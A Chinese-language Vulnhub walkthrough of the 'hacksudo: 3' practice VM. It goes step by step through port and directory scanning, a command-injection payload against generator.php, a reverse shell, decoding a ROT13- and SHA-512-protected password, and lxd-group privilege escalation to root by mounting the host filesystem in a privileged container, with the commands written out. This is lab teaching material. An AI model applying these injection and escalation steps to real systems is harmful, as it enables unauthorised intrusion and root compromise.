IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> Vulnhub靶机测试 NO.29 HACKSUDO: 3 命令执行+凯撒密码sha512解密, + lxd提权 -> 正文阅读

[PHP知识库]Vulnhub靶机测试 NO.29 HACKSUDO: 3 命令执行+凯撒密码sha512解密, + lxd提权

Vulnhub靶机测试 NO.29 HACKSUDO: 3

1 靶机介绍

1.1 靶机地址

https://www.vulnhub.com/entry/hacksudo-fog,697/

1.2 环境搭建

使用VirtualBox启动,靶机ip与kali ip配置 同段

2 测试过程

2.1 nmap探测ip

nmap -sP 192.168.56.0/24
在这里插入图片描述

2.2 nmap扫描端口

nmap -sC -sV -A -p- 192.168.56.119 -o port.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-17 09:46 CST
Nmap scan report for 192.168.56.119
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: Link Lock - Password-protect links
MAC Address: 08:00:27:A6:1E:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.56.119

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.34 seconds

探测到21 22 端口被过滤
21/tcp filtered ftp
22/tcp filtered ssh
开放端口有
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))

操作系统类型版本
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6

2.3 测试思路

只能通过80端口测试漏洞。
首页功能点测试,源码js文件审查,目录扫描,扫描页面功能点测试。

2.4 浏览首页

在这里插入图片描述
发现是一处url链接加密的工具,
发现一些密码 进行记录下来

avocado
urlpage5
torrenting_is-legal!
暂时没有发现其他可利用的点

2.5 目录扫描

gobuster dir -u 192.168.56.119/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt

在这里插入图片描述
发现三个 php页面
/info.php (Status: 200) [Size: 83324]
/login.php (Status: 200) [Size: 497]
/generator.php (Status: 200) [Size: 647]

2.5.1 访问info.php (有用)

在这里插入图片描述
phpinfo页面

2.5.2 访问login.php

在这里插入图片描述
登录页面
测试不提示 账号是否正确

2.5.3 访问generator.php(命令注入)

在这里插入图片描述
一个名称生成器

测试发现存在命令注入
payload

Youth && id

在这里插入图片描述

2.6 命令注入反弹shell

2.6.1 kali开启监听

在这里插入图片描述

2.6.2 反弹shell

在这里插入图片描述
注意bp发送post数据需要url编码 &&

2.7 切换完整shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm 然后 Ctrl+Z 退出来一下
stty raw -echo;fg 回车后输入 reset 再回车
stty rows 46 columns 188

在这里插入图片描述

切换后就可以命令按tab补全等功能

2.8 提权至hacksudo账号

2.8.1 信息收集

在网站目录下发现一个hacksudo 文件

在这里插入图片描述

unpxfhqb ybpxre FFU hfreanzr:unpxfhqb cnffjbeq:63p9142792q571q0s7p28ro30626q6s38792n2r7679o76q784231676q62447so80ns8953745s709p6622qqn2po4q754p262q0q31o3030n08s7o524079n6o336o

看起来像是加密 又有文字 可能是凯撒密码

它是一种替换加密的技术,明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移后被替换成密文。例如,当偏移量是3的时候,所有的字母A将被替换成D,B变成E,以此类推。

2.8.2 凯撒密码解密

最后通过移位13位 得到明文
在这里插入图片描述
hacksudo locker SSH username:hacksudo password:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b

2.8.3 sha512解密

在这里插入图片描述
vishal

2.8.4 su hacksudo -l

su hacksudo -l
vishal
在这里插入图片描述

登录hacksudo 账号成功
得到user.txt的flag
在这里插入图片描述

2.9 lxd提权至root

一般提权我们会看
用户组
内核漏洞
sudo权限
suid文件
cron定时任务
特殊文件权限
不常见的文件等等

2.9.1 用户组

在这里插入图片描述
看见了所属组有lxd
我们可以利用lxd的漏洞将 lxd组用户提权至root

2.9.2 kali攻击机操作

  1. 通过git将构建好的alpine镜像克隆至本地;

    git clone https://github.com/saghul/lxd-alpine-builder.git
    
  2. 执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

    cd lxd-alpine-builder   
    sudo ./build-alpine
    

    在这里插入图片描述
    在这里插入图片描述

  3. 将tar文件发送至目标设备;

    下载好后 启动python http访问

    python3 -m http.server 80
    

2.9.3 靶机操作

靶机操作:

  1. 下载攻击机上的alpine-v3.15-x86_64-20220124_1022.tar.gz

    wget http://192.168.56.137/alpine-v3.15-x86_64-20220317_1435.tar.gz
    
  2. 导入镜像并初始化镜像

    lxc image import ./alpine-v3.15-x86_64-20220317_1435.tar.gz --alias test
    lxc init test test -c security.privileged=true
    

    在这里插入图片描述
    报错了 说没有初始化

    lxd init    一路回车
    

    在这里插入图片描述

    lxc init test test -c security.privileged=true 初始化镜像
    

在这里插入图片描述

  1. 挂载磁盘

    lxc config device add test test disk source=/ path=/mnt/root recursive=true
    

    在这里插入图片描述

  2. 启动镜像并进入镜像访问任意文件

    lxc start test
    lxc exec test /bin/sh
    id
    cd /mnt/root
    ls
    cd /root
    cat proof.txt
    cat root.txt
    

在这里插入图片描述

3 总结

该靶机通过
1.nmap端口信息收集 只扫出80端口。
2.gobuster目录扫描,扫出phpinfo,generator页面(存在命令执行&&id) getshell
3.凯撒密码移位13位和sha512解密 提权至hacksudo用户。
4.lxd提权至root。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-21 20:28:31  更:2022-03-21 20:29:07 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 16:50:18-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计